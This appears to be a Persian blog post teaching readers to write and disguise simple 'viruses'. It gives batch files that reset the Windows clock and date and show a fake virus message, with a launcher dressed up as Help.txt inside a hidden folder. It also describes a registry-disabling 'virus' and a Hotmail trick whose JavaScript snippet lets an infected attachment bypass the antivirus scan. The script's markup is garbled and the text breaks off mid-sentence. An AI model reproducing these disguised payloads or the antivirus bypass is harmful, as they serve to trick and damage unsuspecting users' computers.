تبلیغات
کامپیوتر - کد ویروس نویسیاین ویروس TimeZone ویندوز را صفر میکند.یعنی تایم ویندوز و روز آن صفر میشود.هیچ ضرری برای کامپیوتر ندارد فقط باید دوباره زمان و روز ویندوز خود را تنظیم کنید.و بیشتر برای ترساندن به کار میرود. بازهم مثل همیشه Notepad را باز کنید وکد زیر را در آن تایپ کند. (کد های این قسمت را با کلیدهای کنترل سی و کنترل وی بردارید در غیر این صورت جواب نمی گیرید) @Echo offtime=0:0:0 حال آن را با نام Time0.bat سیو کنید. بعد دوباره NotePad را باز کرده و کد زیر را در آن تایپ کنید. @ECHO OFFdate=10-10-10 این فایل را هم مثل فایل قبلی با نام Date0.bat سیو کنید. حال دوباره NotePad را باز کرده و کد زیر را در آن تایپ کنید. @echo offecho I AM A VIRUSecho SEAT AND SEE MY POWER!!!...pause و آن را با نام Comment.bat ذخیره کنید. یه NotePad باز کرده وکد زیر را در آن تایپ کنید. START TIME0START DATE0START comment وآن را با نام Help.bat ذخیره کنید. بر روی فایل آخر رایت کلیک کرده و Create ShortCut را بزنید و نام آنرا به Help.txt تغییر دهید. سپس با رایت کلیک بر روی Help.txt وانتخاب Properties و زدن Change Icon یه آیکون برای فایل خود انتخاب کنید. بقیه فایلها را در یک Folder ذخیره کنید که شما میتوانید آن Folder را نیز Hidden کنید. حال ویروس ما آماده است.مواظب باشید


************************************************************************

نام ویروس regedit-desabler:


 

توضیح در مورد این ویروس: این ویروس قسمت رجیستری ویندوز را میترکونه یعنی دیگه هیچ برنامه ای نصب یا پاک نمیشه.


 

چگونگی ساخت این ویروس: یک Notepad باز کنید ودر آن متن زیر را تایپ کنید و آنرا با پسوند .bat سیوش کنید.خوب حالا کار ساخت ویروس تمام شد فقط مراقب باشید آنرا در سیستم خود اجرا نکنید.


 


disabled regedit from:grouap pilicy

*********************

این یک ویروس بسیار خطر ناک است که فقط میشه گفت که کامپیوتر قربانی رو بد جور
خراب میکنه

 

گول زدن آنتی ویروس ایمیل برای فرستادن فایل هک


 


مطلب زیر رو امروز از آستالاویستا خوندم
چون جالب به نظرم اومد گفتم اینجا خلاصه شو بگم:
ایراد از اینجا ناشی میشه که تو آدرس-بار به آنتی ویروس اشاره میشه.
برای اینکار نیاز به دو فایل دارین که دومیش آلوده است.
کد زیر رو هم برا فایل اولی بنویسید


<html>
<script>
str1=document.URL
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
window.open("http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a="+str3+"&mimepart=4")
SPAN <>SPAN>script>
SPAN <>SPAN>html>


این کد باعث میشه شما آنتیویروس رو دور بزنید
وقتی طرف شما فایل اولی رو میخواد دانلود کنه آنتی ویروس هات میل اونو چک میکنه.خوب بعد میخواد دانلود بشه! ولی بصورت online باز میشه و ession ID and message ID رو گیر میاره. بعد پنجره جدیدی باز میشه که به فایل دوم اشاره میکنه ولی فایل دوم بدون چک شدن با آنتی ویروس شروع به دانلود میشه. طرف شما می بینه فایل بدون اخطار آنتی ویروس از هات میل داره دانلود میشه.
اگه ظاهر فایل دوم هم شبیه فابل اولی باشه کمتر کسی ممکنه